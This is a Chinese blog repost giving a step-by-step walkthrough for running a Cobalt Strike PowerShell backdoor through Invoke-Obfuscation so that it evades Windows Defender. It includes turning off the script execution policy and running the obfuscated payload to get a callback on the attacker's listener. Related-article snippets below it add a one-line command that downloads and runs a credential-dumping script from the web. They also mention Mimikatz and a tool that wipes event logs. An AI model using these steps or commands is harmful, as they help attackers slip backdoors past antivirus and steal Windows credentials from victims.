Invoke-Obfuscation混淆ps文件绕过Windows_Defender

最新推荐文章于 2024-06-22 15:45:00 发布
最新推荐文章于 2024-06-22 15:45:00 发布
阅读量746 收藏
点赞数 1
原文链接:http://www.cnblogs.com/sstfy/p/10440301.html
版权

前提

powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。
所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

混淆

  • 1.Cobaltstrike制作ps1后门文件
  • 2.进入Invoke-Obfuscation
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

981809-20190226212215011-1115057415.png

可能会报错?!
win10 x64系统 Import-Module 无法加载文件,提示此系统上禁止运行脚本。
981809-20190226212227106-1871288307.png

解决
管理员权限下运行:Set-ExecutionPolicy Unrestricted
981809-20190226212233804-1068383291.png

  • 3.设置ps1文件进行混淆
set scriptpath E:\...\Invoke-Obfuscation_PowerShell\payload.ps1
encoding
1

981809-20190226212242661-1388071176.png

  • 4.输出文件
    out 1.ps1
    981809-20190226212250337-717112939.png

然后运行 powershell 1.ps1./1.ps1,接收端就上线了。

上线

981809-20190226212258385-1117307065.png

powershell是一款很强大的工具,且很多原生不经过任何处理的ps后门文件都能轻松绕过杀软。如不使用,对于安全意识较弱的同学可以删除系统 powershell.exe 程序。

转载于:https://www.cnblogs.com/sstfy/p/10440301.html

weixin_30443895
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过某些主流杀软的检测。例如,在测试过程中,混淆后的脚本不再被某60云查杀和...
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
Invoke-Obfuscation(psh代码混淆)
不知名白帽的博客
08-11 815
Invoke-Obfuscation(psh代码混淆)
Invoke-Obfuscation
weixin_44216796的博客
01-16 2398
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
最新发布
2401_84466223的博客
06-22 580
Invoke-Obfuscation是一款功能强大的PowerShell代码混淆工具,该工具兼容PowerShell v2.0+,能够帮助广大研究人员对PowerShell命令和脚本代码进行混淆处理。
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1294
坑点:window11不行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2296
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
Invoke-and-BeginInvoke.rar_The Difference_invoke
09-23
Windows Forms或WPF等UI环境中,由于UI元素(如控件)只能在其创建的线程(即UI线程)中进行修改,因此,当需要在后台线程更新UI时,`Invoke`和`BeginInvoke`就显得尤为重要。这两个方法都是`Control`类的成员,...
Invoke-ARPScan.ps1
04-04
Invoke-ARPScan.ps1
Delphi-Invoke-Java-WebService.rar_delphi webservice_delphi的invok
09-24
Delphi是一种基于Object Pascal的集成开发环境(IDE),由Embarcadero Technologies公司维护,用于Windows应用开发。Delphi以其高效的编译器和VCL框架闻名,能够快速构建桌面应用程序。 Web服务,特别是Java ...
Invoke-WCMDump结合powershell进行密码获取
03-26
PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
MrWQ#vulnerability-paper#powershell + Invoke-Mimikatz-ps1 获取系统密码
07-25
(1)目标主机具备网络环境 (2)目标主机不具备网络环境 (3)把文件下载到目标主机进行执行
scripts:各种脚本,例如Invoke-Locate.ps1
05-04
Windows中用于GNU的Invoke-Locate.ps1端口。 使用SQLite。 该脚本是根据(Linux / Unix)GNU findutils的locate精神制作的。 尽管此脚本的名称是Invoke-Locate,但实际上它创建了两个持久别名:locate和updatedb...
Invoke-Phant0m:Windows事件日志杀手
02-06
Invoke-Phant0m:Windows事件日志杀手】 Invoke-Phant0m是一个恶意工具,主要用于清除或篡改Windows操作系统中的事件日志。在网络安全领域,它被视为一种反取证技术,因为它能使得攻击者在入侵系统后隐藏其活动...
Invoke-Obfuscation混淆免杀过360和火绒
crowsec
06-01 2089
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
Import-Module : 无法加载文件 D:\anaconda\shell\condabin\Conda.psm1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.micr
qq_49639568的博客
12-25 1186
解决Import-Module : 无法加载文件 D:\anaconda\shell\condabin\Conda.psm1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies。所在位置 行:7 字符: 1Import-Module "$Env:_CONDA_ROOT\shell\condabin\Conda.psm1" -ArgumentL
如何下载Invoke-Obfuscation
04-06
4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件,右键点击该文件选择“以管理员身份运行PowerShell”。 5. 在PowerShell窗口中输入“Import-Module .\Invoke-Obfuscation.psd1”,按回车键进行加载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值